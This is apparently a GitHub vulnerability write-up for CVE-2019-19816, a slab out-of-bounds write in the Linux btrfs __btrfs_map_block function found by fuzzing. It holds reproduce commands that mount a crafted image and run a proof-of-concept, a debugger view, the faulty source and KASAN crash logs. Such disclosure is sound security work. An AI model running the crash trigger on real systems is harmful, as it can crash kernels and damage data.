Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2019-19816/
CVE/CVE-2019-19816/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2019-19816

Target

Linux kernel btrfs FileSystem

Linux Version Availablity
5.0.21 True

Bug Type

out of bounds write

Abstract

some operation(with crafted btrfs filesystem image) can cause out of bounds write in __btrfs_map_block

Reproduce

gcc -o poc poc_2019_19816.c
mkdir mnt
mount poc_2019_19816.img ./mnt
cp poc ./mnt
cd mnt
./poc

Details

Debug view

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0000000000000000  →  0x0000000000000000
$rbx   : 0x0000000000000001  →  0x0000000000000001
$rcx   : 0xffffffff816a1b16  →  0x005d894824048b48  →  0x005d894824048b48
$rdx   : 0x0000000000000001  →  0x0000000000000001
$rsp   : 0xffff88806353f470  →  0xffff888066d49000  →  0x0000000000000001  →  0x0000000000000001
$rbp   : 0xffff888066d49080  →  0xa64000ac00000752  →  0xa64000ac00000752
$rsi   : 0x0000000000000002  →  0x0000000000000002
$rdi   : 0xffff888066d49078  →  0x0000000001400000  →  0x0000000001400000
$rip   : 0xffffffff816a1b7a  →  0xffc1921ee8ef8948  →  0xffc1921ee8ef8948
$r8    : 0xffffed100cda9201  →  0x0000000000000000  →  0x0000000000000000
$r9    : 0xffffed100cda9201  →  0x0000000000000000  →  0x0000000000000000
$r10   : 0x0000000000000001  →  0x0000000000000001
$r11   : 0xffffed100cda9200  →  0x0000000000000000  →  0x0000000000000000
$r12   : 0x0000000000000000  →  0x0000000000000000
$r13   : 0x0000000000000001  →  0x0000000000000001
$r14   : 0x0000000000000001  →  0x0000000000000001
$r15   : 0x0000000000000000  →  0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806353f470│+0x0000: 0xffff888066d49000  →  0x0000000000000001  →  0x0000000000000001	 ← $rsp
0xffff88806353f478│+0x0008: 0xffff88806ca9fe10  →  0x0000000000010000  →  0x0000000000010000
0xffff88806353f480│+0x0010: 0x0000000000000000  →  0x0000000000000000
0xffff88806353f488│+0x0018: 0xffff888067908018  →  0x0000000001400000  →  0x0000000001400000
0xffff88806353f490│+0x0020: 0x0000000000000000  →  0x0000000000000000
0xffff88806353f498│+0x0028: 0x0000000000000001  →  0x0000000000000001
0xffff88806353f4a0│+0x0030: 0xffff888066d49058  →  0xffff888066d49078  →  0x0000000001400000  →  0x0000000001400000
0xffff88806353f4a8│+0x0038: 0x0000000000000000  →  0x0000000000000000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff816a1b71 <__btrfs_map_block+1233> div    esi
   0xffffffff816a1b73 <__btrfs_map_block+1235> mov    edx, edx
   0xffffffff816a1b75 <__btrfs_map_block+1237> lea    rbp, [rbp+rdx*8+0x0]
 → 0xffffffff816a1b7a <__btrfs_map_block+1242> mov    rdi, rbp
   0xffffffff816a1b7d <__btrfs_map_block+1245> call   0xffffffff812bada0 <__asan_store8>
   0xffffffff816a1b82 <__btrfs_map_block+1250> mov    rax, QWORD PTR [rsp+0x48]
   0xffffffff816a1b87 <__btrfs_map_block+1255> mov    QWORD PTR [rbp+0x0], 0xfffffffffffffffe
   0xffffffff816a1b8f <__btrfs_map_block+1263> mov    rax, QWORD PTR [rax]
   0xffffffff816a1b92 <__btrfs_map_block+1266> test   ah, 0x1
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:fs/btrfs/volumes.c+6247 ────
   6242	 		tmp = stripe_nr * nr_data_stripes(map);
   6243	 		for (i = 0; i < nr_data_stripes(map); i++)
   6244	 			bbio->raid_map[(i+rot) % num_stripes] =
   6245	 				em->start + (tmp + i) * map->stripe_len;
   6246
[1] → 6247	 		bbio->raid_map[(i+rot) % map->num_stripes] = RAID5_P_STRIPE;
   6248	 		if (map->type & BTRFS_BLOCK_GROUP_RAID6)
   6249	 			bbio->raid_map[(i+rot+1) % num_stripes] =
   6250	 				RAID6_Q_STRIPE;
   6251	 	}
   6252
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff816a1b7a in __btrfs_map_block (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff812bad33 in memory_is_poisoned_2_4_8 (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff816a1b7a → __btrfs_map_block(fs_info=<optimized out>, op=<optimized out>, logical=<optimized out>, length=<optimized out>, bbio_ret=<optimized out>, mirror_num=<optimized out>, need_raid_map=0x1)
[#1] 0xffffffff816a37cf → btrfs_map_bio(fs_info=0xffff88806a245500, bio=0xffff888065d064f0, mirror_num=0x0, async_submit=<optimized out>)
[#2] 0xffffffff8164e592 → btree_submit_bio_hook(private_data=<optimized out>, bio=0xffff888065d064f0, mirror_num=0x0, bio_flags=<optimized out>, bio_offset=0x1400000)
[#3] 0xffffffff8168ad59 → submit_one_bio(bio=0xffff888065d064f0, mirror_num=0x0, bio_flags=0x0)
[#4] 0xffffffff8168b2aa → flush_write_bio(epd=<optimized out>)
[#5] 0xffffffff81697014 → btree_write_cache_pages(mapping=<optimized out>, wbc=0xffff88806353fa48)
[#6] 0xffffffff8123c54d → do_writepages(mapping=0xffff8880683c4388, wbc=0xffff88806353fa48)
[#7] 0xffffffff81224eb8 → __filemap_fdatawrite_range(mapping=0xffff8880683c4388, start=<optimized out>, end=<optimized out>, sync_mode=<optimized out>)
[#8] 0xffffffff81224fda → filemap_fdatawrite_range(mapping=<optimized out>, start=<optimized out>, end=<optimized out>)
[#9] 0xffffffff81658f1d → btrfs_write_marked_extents(fs_info=0xffff88806a245500, dirty_pages=0xffff8880692a8cb8, mark=0x1)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

In line [1], (i+rot)%map->num_stripes returns value 1

It can cause slab-out-of-bounds

Bug causes

static int __btrfs_map_block(struct btrfs_fs_info *fs_info,
			     enum btrfs_map_op op,
			     u64 logical, u64 *length,
			     struct btrfs_bio **bbio_ret,
			     int mirror_num, int need_raid_map)
{
	...

	/* build raid_map */
	if (map->type & BTRFS_BLOCK_GROUP_RAID56_MASK && need_raid_map &&
	    (need_full_stripe(op) || mirror_num > 1)) {
		u64 tmp;
		unsigned rot;

		bbio->raid_map = (u64 *)((void *)bbio->stripes +
				 sizeof(struct btrfs_bio_stripe) *
				 num_alloc_stripes +
				 sizeof(int) * tgtdev_indexes);

		/* Work out the disk rotation on this stripe-set */
		div_u64_rem(stripe_nr, num_stripes, &rot);

		/* Fill in the logical address of each stripe */
		tmp = stripe_nr * nr_data_stripes(map);
[1]		for (i = 0; i < nr_data_stripes(map); i++)
			bbio->raid_map[(i+rot) % num_stripes] =
				em->start + (tmp + i) * map->stripe_len;

[2]		bbio->raid_map[(i+rot) % map->num_stripes] = RAID5_P_STRIPE;
		...

In line [1], nr_data_stripes(map) returns 1.

when [(i+rot) % map->num_stripes] is 1 in [2], it occurs out of bounds write

KASAN logs

[  393.376653] ==================================================================
[  393.376653] BUG: KASAN: slab-out-of-bounds in __btrfs_map_block+0x4e2/0x1980
[  393.376653] Write of size 8 at addr ffff888066d49080 by task 263/1874
[  393.376653]
[  393.376653] CPU: 0 PID: 1874 Comm: 263 Not tainted 5.0.21 #2
[  393.376653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  393.376653] Call Trace:
[  393.376653]  dump_stack+0x5b/0x8b
[  393.376653]  print_address_description+0x70/0x280
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  kasan_report+0x13a/0x19b
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  __btrfs_map_block+0x4e2/0x1980
[  393.376653]  ? btrfs_put_bbio+0x20/0x20
[  393.376653]  ? btrfs_bio_counter_inc_blocked+0xa0/0x160
[  393.376653]  ? btrfs_bio_counter_sub+0x70/0x70
[  393.376653]  ? bvec_alloc+0x8b/0x160
[  393.376653]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.376653]  btrfs_map_bio+0x12f/0x650
[  393.376653]  ? btrfs_rmap_block+0x3a0/0x3a0
[  393.376653]  ? btree_csum_one_bio.isra.42+0x145/0x160
[  393.376653]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.376653]  btree_submit_bio_hook+0xe2/0x130
[  393.376653]  submit_one_bio+0xc9/0x100
[  393.376653]  flush_write_bio.isra.41+0x1a/0x40
[  393.376653]  btree_write_cache_pages+0x394/0x530
[  393.376653]  ? write_one_eb+0x3a0/0x3a0
[  393.376653]  ? __sched_text_start+0x8/0x8
[  393.376653]  ? kasan_unpoison_shadow+0x31/0x40
[  393.376653]  ? rb_next+0x4f/0x80
[  393.376653]  ? merge_state.part.45+0x7d/0x250
[  393.376653]  ? __kasan_slab_free+0x147/0x180
[  393.376653]  ? convert_extent_bit+0x4f8/0x6b0
[  393.376653]  ? kmem_cache_free+0x70/0x190
[  393.376653]  ? convert_extent_bit+0x4f8/0x6b0
[  393.376653]  do_writepages+0x2d/0xa0
[  393.376653]  __filemap_fdatawrite_range+0xf8/0x160
[  393.376653]  ? delete_from_page_cache_batch+0x4a0/0x4a0
[  393.376653]  ? btrfs_commit_transaction+0x7da/0xf90
[  393.376653]  ? find_first_extent_bit+0xe6/0x1b0
[  393.376653]  btrfs_write_marked_extents+0x24d/0x260
[  393.376653]  ? btrfs_should_end_transaction+0x80/0x80
[  393.376653]  ? _raw_write_lock_irqsave+0xf0/0xf0
[  393.376653]  ? _raw_read_lock_irq+0x30/0x30
[  393.376653]  ? __wake_up_common+0x4a/0x1d0
[  393.376653]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.376653]  ? btrfs_wait_extents+0x40/0x40
[  393.376653]  ? btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  ? btrfs_apply_pending_changes+0x80/0x80
[  393.376653]  ? up_write+0xd/0x30
[  393.376653]  btrfs_sync_file+0x5b3/0x600
[  393.376653]  ? start_ordered_ops+0x120/0x120
[  393.376653]  ? vfs_read+0x122/0x190
[  393.376653]  ? ksys_read+0x131/0x160
[  393.376653]  ? kernel_write+0x90/0x90
[  393.376653]  ? vfs_fsync_range+0x81/0x100
[  393.376653]  do_fsync+0x33/0x60
[  393.376653]  __x64_sys_fsync+0x18/0x20
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653] RIP: 0033:0x7f1fb191e469
[  393.376653] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ff 49 2b 00 f7 d8 64 89 01 48
[  393.376653] RSP: 002b:00007ffe703b9708 EFLAGS: 00000217 ORIG_RAX: 000000000000004a
[  393.376653] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f1fb191e469
[  393.376653] RDX: 00007f1fb191e469 RSI: 0000000000001c52 RDI: 0000000000000003
[  393.376653] RBP: 00007ffe703bb7b0 R08: 00007ffe703bb898 R09: 00007ffe703bb898
[  393.376653] R10: 00007ffe703bb898 R11: 0000000000000217 R12: 000055ebba9005f0
[  393.376653] R13: 00007ffe703bb890 R14: 0000000000000000 R15: 0000000000000000
[  393.376653]
[  393.376653] Allocated by task 1874:
[  393.376653]  __kasan_kmalloc+0xd5/0xf0
[  393.376653]  alloc_btrfs_bio+0x1b/0x60
[  393.376653]  __btrfs_map_block+0xe9a/0x1980
[  393.376653]  btrfs_map_bio+0x12f/0x650
[  393.376653]  btree_submit_bio_hook+0xe2/0x130
[  393.376653]  submit_one_bio+0xc9/0x100
[  393.376653]  flush_write_bio.isra.41+0x1a/0x40
[  393.376653]  btree_write_cache_pages+0x394/0x530
[  393.376653]  do_writepages+0x2d/0xa0
[  393.376653]  __filemap_fdatawrite_range+0xf8/0x160
[  393.376653]  btrfs_write_marked_extents+0x24d/0x260
[  393.376653]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.376653]  btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  btrfs_sync_file+0x5b3/0x600
[  393.376653]  do_fsync+0x33/0x60
[  393.376653]  __x64_sys_fsync+0x18/0x20
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653]
[  393.376653] Freed by task 1835:
[  393.376653]  __kasan_slab_free+0x132/0x180
[  393.376653]  kfree+0x8c/0x1a0
[  393.376653]  blk_rq_unmap_user+0x34/0x70
[  393.376653]  sg_io+0x466/0x680
[  393.376653]  scsi_cmd_ioctl+0x362/0x4e0
[  393.376653]  cdrom_ioctl+0x106/0x1419
[  393.376653]  sr_block_ioctl+0xc0/0xf0
[  393.376653]  blkdev_ioctl+0x8e7/0xdb0
[  393.376653]  block_ioctl+0x68/0x80
[  393.376653]  do_vfs_ioctl+0x139/0x8c0
[  393.376653]  ksys_ioctl+0x61/0x70
[  393.376653]  __x64_sys_ioctl+0x38/0x40
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653]
[  393.376653] The buggy address belongs to the object at ffff888066d49000
[  393.376653]  which belongs to the cache kmalloc-128 of size 128
[  393.376653] The buggy address is located 0 bytes to the right of
[  393.376653]  128-byte region [ffff888066d49000, ffff888066d49080)
[  393.376653] The buggy address belongs to the page:
[  393.376653] page:ffffea00019b5240 count:1 mapcount:0 mapping:ffff88806d001640 index:0x0
[  393.376653] flags: 0x100000000000200(slab)
[  393.376653] raw: 0100000000000200 ffffea0001a98040 0000001700000017 ffff88806d001640
[  393.376653] raw: 0000000000000000 0000000080150015 00000001ffffffff 0000000000000000
[  393.376653] page dumped because: kasan: bad access detected
[  393.376653]
[  393.376653] Memory state around the buggy address:
[  393.376653]  ffff888066d48f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  393.376653]  ffff888066d49000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  393.376653] >ffff888066d49080: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[  393.376653]                    ^
[  393.376653]  ffff888066d49100: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  393.376653]  ffff888066d49180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  393.376653] ==================================================================
[  393.376653] Disabling lock debugging due to kernel taint
[  393.754098] ------------[ cut here ]------------
[  393.754098] kernel BUG at fs/btrfs/raid56.c:522!
[  393.754098] invalid opcode: 0000 [#1] SMP KASAN NOPTI
[  393.754098] CPU: 0 PID: 1874 Comm: 263 Tainted: G    B             5.0.21 #2
[  393.754098] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  393.754098] RIP: 0010:rbio_is_full+0x81/0x90
[  393.754098] Code: ed 49 39 ed 74 1d bb 00 00 00 00 77 1d 4c 89 f6 4c 89 e7 e8 71 9e ca 00 89 d8 5b 5d 41 5c 41 5d 41 5e c3 bb 01 00 00 00 eb e3 <0f> 0b 0f 1f 00 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 49 89 fe
[  393.754098] RSP: 0018:ffff88806353f598 EFLAGS: 00000006
[  393.754098] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8171f16e
[  393.754098] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8880699f2938
[  393.754098] RBP: 0000000000000000 R08: 1ffff1100c6a7ea7 R09: ffffed100c6a7ea7
[  393.754098] R10: 0000000000000001 R11: ffffed100c6a7ea7 R12: ffff8880699f2918
[  393.754098] R13: 0000000000001000 R14: 0000000000000246 R15: ffff888066d49004
[  393.754098] FS:  00007f1fb1df7440(0000) GS:ffff88806d400000(0000) knlGS:0000000000000000
[  393.754098] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  393.754098] CR2: 00007f3e68868000 CR3: 00000000678e2000 CR4: 00000000000006f0
[  393.754098] Call Trace:
[  393.754098]  raid56_parity_write+0xd1/0x210
[  393.754098]  btrfs_map_bio+0x620/0x650
[  393.754098]  ? btrfs_rmap_block+0x3a0/0x3a0
[  393.754098]  ? btree_csum_one_bio.isra.42+0x145/0x160
[  393.754098]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.754098]  btree_submit_bio_hook+0xe2/0x130
[  393.754098]  submit_one_bio+0xc9/0x100
[  393.754098]  flush_write_bio.isra.41+0x1a/0x40
[  393.754098]  btree_write_cache_pages+0x394/0x530
[  393.754098]  ? write_one_eb+0x3a0/0x3a0
[  393.754098]  ? __sched_text_start+0x8/0x8
[  393.754098]  ? kasan_unpoison_shadow+0x31/0x40
[  393.754098]  ? rb_next+0x4f/0x80
[  393.754098]  ? merge_state.part.45+0x7d/0x250
[  393.754098]  ? __kasan_slab_free+0x147/0x180
[  393.754098]  ? convert_extent_bit+0x4f8/0x6b0
[  393.754098]  ? kmem_cache_free+0x70/0x190
[  393.754098]  ? convert_extent_bit+0x4f8/0x6b0
[  393.754098]  do_writepages+0x2d/0xa0
[  393.754098]  __filemap_fdatawrite_range+0xf8/0x160
[  393.754098]  ? delete_from_page_cache_batch+0x4a0/0x4a0
[  393.754098]  ? btrfs_commit_transaction+0x7da/0xf90
[  393.754098]  ? find_first_extent_bit+0xe6/0x1b0
[  393.754098]  btrfs_write_marked_extents+0x24d/0x260
[  393.754098]  ? btrfs_should_end_transaction+0x80/0x80
[  393.754098]  ? _raw_write_lock_irqsave+0xf0/0xf0
[  393.754098]  ? _raw_read_lock_irq+0x30/0x30
[  393.754098]  ? __wake_up_common+0x4a/0x1d0
[  393.754098]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.754098]  ? btrfs_wait_extents+0x40/0x40
[  393.754098]  ? btrfs_commit_transaction+0xbcb/0xf90
[  393.754098]  btrfs_commit_transaction+0xbcb/0xf90
[  393.754098]  ? btrfs_apply_pending_changes+0x80/0x80
[  393.754098]  ? up_write+0xd/0x30
[  393.754098]  btrfs_sync_file+0x5b3/0x600
[  393.754098]  ? start_ordered_ops+0x120/0x120
[  393.754098]  ? vfs_read+0x122/0x190
[  393.754098]  ? ksys_read+0x131/0x160
[  393.754098]  ? kernel_write+0x90/0x90
[  393.754098]  ? vfs_fsync_range+0x81/0x100
[  393.754098]  do_fsync+0x33/0x60
[  393.754098]  __x64_sys_fsync+0x18/0x20
[  393.754098]  do_syscall_64+0x5e/0x150
[  393.754098]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.754098] RIP: 0033:0x7f1fb191e469
[  393.754098] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ff 49 2b 00 f7 d8 64 89 01 48
[  393.754098] RSP: 002b:00007ffe703b9708 EFLAGS: 00000217 ORIG_RAX: 000000000000004a
[  393.754098] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f1fb191e469
[  393.754098] RDX: 00007f1fb191e469 RSI: 0000000000001c52 RDI: 0000000000000003
[  393.754098] RBP: 00007ffe703bb7b0 R08: 00007ffe703bb898 R09: 00007ffe703bb898
[  393.754098] R10: 00007ffe703bb898 R11: 0000000000000217 R12: 000055ebba9005f0
[  393.754098] R13: 00007ffe703bb890 R14: 0000000000000000 R15: 0000000000000000
[  393.754098] Modules linked in:
[  393.754098] ---[ end trace 9f5b48be7c76db7a ]---
[  393.754098] RIP: 0010:rbio_is_full+0x81/0x90
[  393.754098] Code: ed 49 39 ed 74 1d bb 00 00 00 00 77 1d 4c 89 f6 4c 89 e7 e8 71 9e ca 00 89 d8 5b 5d 41 5c 41 5d 41 5e c3 bb 01 00 00 00 eb e3 <0f> 0b 0f 1f 00 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 49 89 fe
[  393.754098] RSP: 0018:ffff88806353f598 EFLAGS: 00000006
[  393.754098] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8171f16e
[  393.754098] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8880699f2938
[  393.754098] RBP: 0000000000000000 R08: 1ffff1100c6a7ea7 R09: ffffed100c6a7ea7
[  393.754098] R10: 0000000000000001 R11: ffffed100c6a7ea7 R12: ffff8880699f2918
[  393.754098] R13: 0000000000001000 R14: 0000000000000246 R15: ffff888066d49004
[  393.754098] FS:  00007f1fb1df7440(0000) GS:ffff88806d400000(0000) knlGS:0000000000000000
[  393.754098] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  393.754098] CR2: 00007f3e68868000 CR3: 00000000678e2000 CR4: 00000000000006f0
Segmentation fault

Conclusion

when nr_data_stripes(map) returns 1, it can occur out of bounds write in __btrfs_map_block function

Discoverer

Team bobfuzzer

Acknowledgments

This Project used ported version(to 5.0.21 and 5.3.14 linux kernel) of filesystem fuzzer 'JANUS' which developed by GeorgiaTech Systems Software & Security Lab(SSLab)

Thank you for the excellent fuzzer and paper below.